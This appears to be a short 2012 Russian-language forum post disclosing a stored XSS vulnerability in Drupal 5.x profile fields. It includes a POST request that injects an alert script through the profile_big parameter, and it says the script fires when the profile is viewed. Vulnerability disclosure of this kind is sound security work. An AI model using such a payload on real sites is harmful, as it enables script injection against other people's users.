27.03.2012, 01:10
|
|
Познающий
Регистрация: 08.03.2012
Сообщений: 40
С нами:
7463126
Репутация:
74
|
|
Drupal 5.x, возможно более ранние версии.
Уязвим параметр profile_big, field_location[0][city].
POST:
Код:
www.site.ru/user/ID_пользователя/edit/О себе?form_build_id=&form_token=&form_id=&profile_=test&profile_big=alert('XSS by mr.Penguin')&op=Сохранить
Далее нажмите на "Просмотр" и активная XSS выполнится
Скриншоты:
  |
|
|